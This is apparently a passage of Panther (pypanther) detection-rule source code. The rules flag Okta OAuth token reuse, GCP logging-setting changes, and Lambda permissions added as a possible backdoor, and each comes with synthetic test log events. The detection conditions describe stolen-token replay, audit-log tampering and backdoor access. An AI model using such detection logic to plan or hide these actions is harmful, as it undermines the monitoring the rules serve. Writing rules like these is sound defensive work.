        return okta_alert_context(event)

    tests = [
        RuleTest(
            name="Non-event",
            expected_result=False,
            log={
                "actor": {
                    "alternateId": "123456",
                    "displayName": "Okta User",
                    "id": "okta.1234.",
                    "type": "PublicClientApp",
                },
                "authenticationcontext": {"authenticationStep": 0, "externalSessionId": "123456789"},
                "client": {
                    "device": "Computer",
                    "geographicalContext": {
                        "city": "Queens",
                        "country": "United States",
                        "geolocation": {"lat": 40, "lon": -70},
                        "postalCode": "11375",
                        "state": "New York",
                    },
                    "id": "okta.1234",
                    "ipAddress": "1.2.3.4",
                    "userAgent": {
                        "browser": "SAFARI",
                        "os": "Mac OS X",
                        "rawUserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15",
                    },
                    "zone": "null",
                },
                "debugcontext": {
                    "debugData": {
                        "authnRequestId": "yyyy-abc-1111",
                        "behaviors": "{New Geo-Location=NEGATIVE, New Device=NEGATIVE, New IP=NEGATIVE, New State=NEGATIVE, New Country=NEGATIVE, Velocity=NEGATIVE, New City=NEGATIVE}",
                        "dtHash": "11aabbccc",
                        "grantType": "authorization_code",
                        "grantedScopes": "openid, profile, email, okta.users.read.self",
                        "redirectUri": "https://org.okta.com/enduser/callback",
                        "requestId": "ABCDEFG",
                        "requestUri": "/login/token/redirect",
                        "requestedScopes": "openid, profile, email, okta.users.read.self",
                        "responseMode": "query",
                        "responseType": "code",
                        "risk": "{level=LOW}",
                        "state": "SDFJDSLFS1234",
                        "threatSuspected": "false",
                        "url": "/login/token/redirect?stateToken=02.id.ASDDFJLKF",
                        "userId": "00abc124",
                    },
                },
                "displaymessage": "OIDC authorization code request",
                "eventtype": "app.oauth2.authorize.code",
                "legacyeventtype": "app.oauth2.authorize.code_success",
                "outcome": {"result": "SUCCESS"},
                "published": "2022-12-13 15:22:58.759",
                "request": {
                    "ipChain": [
                        {
                            "geographicalContext": {
                                "city": "Queens",
                                "country": "United States",
                                "geolocation": {"lat": 40, "lon": -70},
                                "postalCode": "11375",
                                "state": "New York",
                            },
                            "ip": "1.2.3.4",
                            "version": "V4",
                        },
                    ],
                },
                "securitycontext": {
                    "asNumber": 701,
                    "asOrg": "verizon",
                    "domain": "verizon.net",
                    "isProxy": False,
                    "isp": "verizon",
                },
                "severity": "INFO",
                "target": [
                    {"id": "abcd123", "type": "User"},
                    {"displayName": "Authorization Code", "id": "SDFSFJL", "type": "code"},
                ],
                "transaction": {"detail": {}, "id": "SDKFLSKLFJSLF", "type": "WEB"},
                "uuid": "abc-1234-aaa",
                "version": "0",
            },
        ),
        RuleTest(
            name="Reuse Event",
            expected_result=True,
            log={
                "actor": {
                    "alternateId": "123456",
                    "displayName": "Okta User",
                    "id": "okta.1234.",
                    "type": "PublicClientApp",
                },
                "authenticationcontext": {"authenticationStep": 0, "externalSessionId": "123456789"},
                "client": {
                    "device": "Computer",
                    "geographicalContext": {
                        "city": "Queens",
                        "country": "United States",
                        "geolocation": {"lat": 40, "lon": -70},
                        "postalCode": "11375",
                        "state": "New York",
                    },
                    "id": "okta.1234",
                    "ipAddress": "1.2.3.4",
                    "userAgent": {
                        "browser": "SAFARI",
                        "os": "Mac OS X",
                        "rawUserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15",
                    },
                    "zone": "null",
                },
                "debugcontext": {
                    "debugData": {
                        "authnRequestId": "yyyy-abc-1111",
                        "behaviors": "{New Geo-Location=NEGATIVE, New Device=NEGATIVE, New IP=NEGATIVE, New State=NEGATIVE, New Country=NEGATIVE, Velocity=NEGATIVE, New City=NEGATIVE}",
                        "dtHash": "11aabbccc",
                        "grantType": "authorization_code",
                        "grantedScopes": "openid, profile, email, okta.users.read.self",
                        "redirectUri": "https://org.okta.com/enduser/callback",
                        "requestId": "ABCDEFG",
                        "requestUri": "/login/token/redirect",
                        "requestedScopes": "openid, profile, email, okta.users.read.self",
                        "responseMode": "query",
                        "responseType": "code",
                        "risk": "{level=LOW}",
                        "state": "SDFJDSLFS1234",
                        "threatSuspected": "false",
                        "url": "/login/token/redirect?stateToken=02.id.ASDDFJLKF",
                        "userId": "00abc124",
                    },
                },
                "displaymessage": "Token Reuse",
                "eventtype": "app.oauth2.token.detect_reuse",
                "legacyeventtype": "app.oauth2.token.detect_reuse",
                "outcome": {"result": "SUCCESS"},
                "published": "2022-12-13 15:22:58.759",
                "request": {
                    "ipChain": [
                        {
                            "geographicalContext": {
                                "city": "Queens",
                                "country": "United States",
                                "geolocation": {"lat": 40, "lon": -70},
                                "postalCode": "11375",
                                "state": "New York",
                            },
                            "ip": "1.2.3.4",
                            "version": "V4",
                        },
                    ],
                },
                "securitycontext": {
                    "asNumber": 701,
                    "asOrg": "verizon",
                    "domain": "verizon.net",
                    "isProxy": False,
                    "isp": "verizon",
                },
                "severity": "INFO",
                "target": [
                    {"id": "abcd123", "type": "User"},
                    {"displayName": "Authorization Code", "id": "SDFSFJL", "type": "code"},
                ],
                "transaction": {"detail": {}, "id": "SDKFLSKLFJSLF", "type": "WEB"},
                "uuid": "abc-1234-aaa",
                "version": "0",
            },
        ),
    ]



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed


@panther_managed
class GCPLoggingSettingsModified(Rule):
    default_description = "Detects any changes made to logging settings"
    display_name = "GCP Logging Settings Modified"
    default_reference = "https://cloud.google.com/logging/docs/default-settings"
    default_severity = Severity.LOW
    log_types = [LogType.GCP_AUDIT_LOG]
    id = "GCP.Logging.Settings.Modified-prototype"

    def rule(self, event):
        return all(
            [
                event.deep_get("protoPayload", "serviceName", default="") == "logging.googleapis.com",
                "Update" in event.deep_get("protoPayload", "methodName", default=""),
            ],
        )

    def title(self, event):
        resource = event.deep_get("protoPayload", "resourceName", default="<RESOURCE_NOT_FOUND>")
        actor = event.deep_get("protoPayload", "authenticationInfo", "principalEmail", default="<ACTOR_NOT_FOUND>")
        return f"GCP [{resource}] logging settings modified by [{actor}]."

    def dedup(self, event):
        actor = event.deep_get("protoPayload", "authenticationInfo", "principalEmail", default="<ACTOR_NOT_FOUND>")
        return actor

    def alert_context(self, event):
        return {
            "resource": event.deep_get("protoPayload", "resourceName", default="<RESOURCE_NOT_FOUND>"),
            "actor": event.deep_get(
                "protoPayload",
                "authenticationInfo",
                "principalEmail",
                default="<ACTOR_NOT_FOUND>",
            ),
            "method": event.deep_get("protoPayload", "methodName", default="<METHOD_NOT_FOUND>"),
        }

    tests = [
        RuleTest(
            name="Other Event",
            expected_result=False,
            log={
                "insertid": "abcdefghijklmn",
                "logname": "projects/gcp-project1/logs/cloudaudit.googleapis.com%2Factivity",
                "operation": {
                    "id": "1234567890123-gcp-project1:abcdefghijklmnopqrstuvwz",
                    "last": True,
                    "producer": "bigquery.googleapis.com",
                },
                "p_any_emails": ["user@company.io"],
                "p_any_ip_addresses": ["1.2.3.4"],
                "p_event_time": "2023-03-28 18:37:06.079",
                "p_log_type": "GCP.AuditLog",
                "p_parse_time": "2023-03-28 18:38:14.478",
                "p_row_id": "06bf03d9d5dfbadba981899e1787bf05",
                "p_schema_version": 0,
                "p_source_id": "964c7894-9a0d-4ddf-864f-0193438221d6",
                "p_source_label": "gcp-logsource",
                "protopayload": {
                    "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                    "authenticationInfo": {"principalEmail": "user@company.io"},
                    "authorizationInfo": [
                        {
                            "granted": True,
                            "permission": "bigquery.tables.delete",
                            "resource": "projects/gcp-project1/datasets/test1/tables/newtable",
                        },
                    ],
                    "metadata": {
                        "@type": "type.googleapis.com/google.cloud.audit.BigQueryAuditMetadata",
                        "methodName": "google.cloud.bigquery.v2.JobService.InsertJob",
                        "requestMetadata": {
                            "callerIP": "1.2.3.4",
                            "callerSuppliedUserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36,gzip(gfe),gzip(gfe)",
                        },
                        "resourceName": "projects/gcp-project1/datasets/test1/tables/newtable",
                        "serviceName": "bigquery.googleapis.com",
                        "status": {},
                        "tableDeletion": {
                            "jobName": "projects/gcp-project1/jobs/bquxjob_5e4a0679_18729a639d7",
                            "reason": "QUERY",
                        },
                    },
                    "receivetimestamp": "2023-03-28 18:37:06.745",
                    "resource": {
                        "labels": {"dataset_id": "test1", "project_id": "gcp-project1"},
                        "type": "bigquery_dataset",
                    },
                    "severity": "NOTICE",
                    "timestamp": "2023-03-28 18:37:06.079",
                },
            },
        ),
        RuleTest(
            name="Sink Update Event",
            expected_result=True,
            log={
                "insertid": "ezyd47c12y",
                "logname": "projects/gcp-project1/logs/cloudaudit.googleapis.com%2Factivity",
                "p_any_ip_addresses": ["1.2.3.4"],
                "p_event_time": "2023-03-09 16:41:30.524",
                "p_log_type": "GCP.AuditLog",
                "p_parse_time": "2023-03-09 16:44:14.617",
                "p_row_id": "1234567909689348911",
                "p_source_id": "4fc88a5a-2d51-4279-9c4a-08fa7cc52566",
                "p_source_label": "gcplogsource",
                "protoPayload": {
                    "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                    "authenticationInfo": {"principalEmail": "test@company.io"},
                    "authorizationInfo": [
                        {
                            "granted": True,
                            "permission": "logging.sinks.update",
                            "resource": "projects/gcp-project1/sinks/log-sink",
                            "resourceAttributes": {
                                "name": "projects/gcp-project1/sinks/log-sink",
                                "service": "logging.googleapis.com",
                            },
                        },
                    ],
                    "methodName": "google.logging.v2.ConfigServiceV2.UpdateSink",
                    "request": {
                        "@type": "type.googleapis.com/google.logging.v2.UpdateSinkRequest",
                        "sink": {
                            "destination": "pubsub.googleapis.com/projects/gcp-project1/topics/gcp-topic1",
                            "exclusions": [{"filter": "protoPayload.serviceName = 'k8s.io", "name": "excludek8s"}],
                            "name": "log-sink",
                            "writerIdentity": "serviceAccount:p197946410614-915152@gcp-sa-logging.iam.gserviceaccount.com",
                        },
                        "sinkName": "projects/gcp-project1/sinks/log-sink",
                        "uniqueWriterIdentity": True,
                        "updateMask": "exclusions",
                    },
                    "requestMetadata": {
                        "callerIP": "1.2.3.4",
                        "callerSuppliedUserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36,gzip(gfe),gzip(gfe)",
                        "destinationAttributes": {},
                        "requestAttributes": {"auth": {}, "time": "2023-03-09T16:41:30.540045105Z"},
                    },
                    "resourceName": "projects/gcp-project1/sinks/log-sink",
                    "serviceName": "logging.googleapis.com",
                    "status": {},
                },
                "receivetimestamp": "2023-03-09 16:41:32.21",
                "resource": {
                    "labels": {"destination": "", "name": "log-sink", "project_id": "gcp-project1"},
                    "type": "logging_sink",
                },
                "severity": "NOTICE",
                "timestamp": "2023-03-09 16:41:30.524",
            },
        ),
    ]



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.aws import aws_cloudtrail_success, aws_rule_context


@panther_managed
class AWSPotentialBackdoorLambda(Rule):
    id = "AWS.Potential.Backdoor.Lambda-prototype"
    display_name = "AWS Potential Backdoor Lambda Function Through Resource-Based Policy"
    log_types = [LogType.AWS_CLOUDTRAIL]
    reports = {"MITRE ATT&CK": ["TA0007:T1078"]}
    default_severity = Severity.INFO
    tags = ["Beta"]
    default_description = (
        "Identifies when a permission is added to a Lambda function, which could indicate a potential security risk.\n"
    )
    default_runbook = "Make sure that the permission is legitimate and necessary. If not, remove the permission"
    default_reference = "https://docs.aws.amazon.com/lambda/latest/dg/API_AddPermission.html"
    ADD_PERMISSION_EVENTS = {"AddPermission20150331", "AddPermission20150331v2"}

    def rule(self, event):
        return (
            aws_cloudtrail_success(event)
            and event.get("eventSource") == "lambda.amazonaws.com"
            and (event.get("eventName") in self.ADD_PERMISSION_EVENTS)
        )

    def title(self, event):
        lambda_name = event.deep_get("requestParameters", "functionName", default="LAMBDA_NAME_NOT_FOUND")
        return f"[AWS.CloudTrail] User [{event.udm('actor_user')}] added permission to Lambda function [{lambda_name}]"

    def alert_context(self, event):
        return aws_rule_context(event)

    tests = [
        RuleTest(
            name="Lambda Add Permission Event",
            expected_result=True,
            log={
                "eventVersion": "1.05",
                "userIdentity": {
                    "type": "AssumedRole",
                    "principalId": "tester",
                    "arn": "arn:aws:sts::123456789012:assumed-role/tester",
                    "accountId": "123456789012",
                    "accessKeyId": "1",
                    "sessionContext": {
                        "sessionIssuer": {
                            "type": "Role",
                            "principalId": "1111",
                            "arn": "arn:aws:iam::123456789012:role/tester",
                            "accountId": "123456789012",
                            "userName": "Tester",
                        },
                        "webIdFederationData": {},
                        "attributes": {"mfaAuthenticated": "true", "creationDate": "2019-01-01T00:00:00Z"},
                    },
                },
                "eventTime": "2019-01-01T00:00:00Z",
                "eventSource": "lambda.amazonaws.com",
                "eventName": "AddPermission20150331",
                "awsRegion": "us-west-2",
                "sourceIPAddress": "111.111.111.111",
                "userAgent": "console.amazonaws.com",
                "requestParameters": {"functionName": "my-lambda-function"},
                "responseElements": None,
                "requestID": "1",
                "eventID": "1",
                "readOnly": False,
                "eventType": "AwsApiCall",
                "recipientAccountId": "123456789012",
                "p_log_type": "AWS.CloudTrail",
            },
        ),
        RuleTest(
            name="Lambda Add Permission Event v2",
            expected_result=True,
            log={
                "eventVersion": "1.05",
                "userIdentity": {
                    "type": "AssumedRole",
                    "principalId": "tester",
                    "arn": "arn:aws:sts::123456789012:assumed-role/tester",
                    "accountId": "123456789012",
                    "accessKeyId": "1",
                    "sessionContext": {
                        "sessionIssuer": {
                            "type": "Role",
                            "principalId": "1111",
                            "arn": "arn:aws:iam::123456789012:role/tester",
                            "accountId": "123456789012",
                            "userName": "Tester",
                        },
                        "webIdFederationData": {},
                        "attributes": {"mfaAuthenticated": "true", "creationDate": "2019-01-01T00:00:00Z"},
                    },
                },
                "eventTime": "2019-01-01T00:00:00Z",
                "eventSource": "lambda.amazonaws.com",
                "eventName": "AddPermission20150331v2",
                "awsRegion": "us-west-2",
                "sourceIPAddress": "111.111.111.111",
                "userAgent": "console.amazonaws.com",
                "requestParameters": {"functionName": "my-lambda-function"},
                "responseElements": None,
                "requestID": "1",
                "eventID": "1",
                "readOnly": False,
                "eventType": "AwsApiCall",
                "recipientAccountId": "123456789012",
                "p_log_type": "AWS.CloudTrail",
            },
        ),
        RuleTest(
            name="Lambda Remove Permission Event",
            expected_result=False,
            log={
                "eventVersion": "1.05",
                "userIdentity": {
                    "type": "AssumedRole",
                    "principalId": "tester",
                    "arn": "arn:aws:sts::123456789012:assumed-role/tester",
                    "accountId": "123456789012",
                    "accessKeyId": "1",
                    "sessionContext": {
                        "sessionIssuer": {
                            "type": "Role",
                            "principalId": "1111",
                            "arn": "arn:aws:iam::123456789012:role/tester",
                            "accountId": "123456789012",
                            "userName": "Tester",
                        },
                        "webIdFederationData": {},
                        "attributes": {"mfaAuthenticated": "true", "creationDate": "2019-01-01T00:00:00Z"},
                    },
                },
                "eventTime": "2019-01-01T00:00:00Z",
                "eventSource": "lambda.amazonaws.com",
                "eventName": "RemovePermission",
                "awsRegion": "us-west-2",
                "sourceIPAddress": "111.111.111.111",
                "userAgent": "console.amazonaws.com",
                "requestParameters": {"functionName": "my-lambda-function"},
                "responseElements": None,
                "requestID": "1",
                "eventID": "1",
                "readOnly": False,
                "eventType": "AwsApiCall",
                "recipientAccountId": "123456789012",
                "p_log_type": "AWS.CloudTrail",
            },
        ),
    ]
